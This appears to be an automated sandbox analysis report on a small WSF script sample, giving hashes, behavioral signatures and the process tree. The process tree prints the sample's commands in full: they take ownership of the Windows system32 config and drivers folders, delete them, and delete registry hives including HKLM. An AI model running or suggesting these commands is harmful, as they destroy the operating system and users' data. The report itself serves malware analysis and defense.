Analysis
-
max time kernel
148s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-08-2024 21:41
Static task
static1
Behavioral task
behavioral1
Sample
file01.wsf
Resource
win7-20240708-en
General
-
Target
file01.wsf
-
Size
3KB
-
MD5
fefe72db31bfdbe4a0ae7f11cb852008
-
SHA1
a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
-
SHA256
d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
-
SHA512
a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exepid process 4136 icacls.exe 4744 icacls.exe 3464 takeown.exe 3692 takeown.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation WScript.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 3464 takeown.exe 3692 takeown.exe 4136 icacls.exe 4744 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 3464 takeown.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 1408 wrote to memory of 3920 1408 cmd.exe WScript.exe PID 1408 wrote to memory of 3920 1408 cmd.exe WScript.exe PID 3920 wrote to memory of 440 3920 WScript.exe cmd.exe PID 3920 wrote to memory of 440 3920 WScript.exe cmd.exe PID 3920 wrote to memory of 4296 3920 WScript.exe cmd.exe PID 3920 wrote to memory of 4296 3920 WScript.exe cmd.exe PID 4296 wrote to memory of 3464 4296 cmd.exe takeown.exe PID 4296 wrote to memory of 3464 4296 cmd.exe takeown.exe PID 440 wrote to memory of 3692 440 cmd.exe takeown.exe PID 440 wrote to memory of 3692 440 cmd.exe takeown.exe PID 440 wrote to memory of 4136 440 cmd.exe icacls.exe PID 440 wrote to memory of 4136 440 cmd.exe icacls.exe PID 4296 wrote to memory of 4744 4296 cmd.exe icacls.exe PID 4296 wrote to memory of 4744 4296 cmd.exe icacls.exe PID 3920 wrote to memory of 4824 3920 WScript.exe reg.exe PID 3920 wrote to memory of 4824 3920 WScript.exe reg.exe PID 3920 wrote to memory of 3092 3920 WScript.exe reg.exe PID 3920 wrote to memory of 3092 3920 WScript.exe reg.exe PID 3920 wrote to memory of 2388 3920 WScript.exe reg.exe PID 3920 wrote to memory of 2388 3920 WScript.exe reg.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3692
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4744
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" delete HKCR\*.dll3⤵PID:4824
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" delete HKCR\*.exe3⤵PID:3092
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" delete HKLM\*3⤵
- Modifies registry key
PID:2388
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5fefe72db31bfdbe4a0ae7f11cb852008
SHA1a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
SHA256d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
SHA512a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0
-
Filesize
79B
MD5355d25ae00d82afebe47bffcaa713a40
SHA1c6790a7e5d81ad3d1149974c75947d3b2509f544
SHA25693ac1d1665ee61e357aa40a09b1671be28e8c662d5d7601fb6156f1eafcb018c
SHA51208d5b20fb2d6720c47ff5bc3cbb1ac5f7d8090bb014c13cf2da1c7f8da991ae6b1cf4d8b67aebd7d17077defe5845509dd95963c5d524a1cda79b782e247d4fa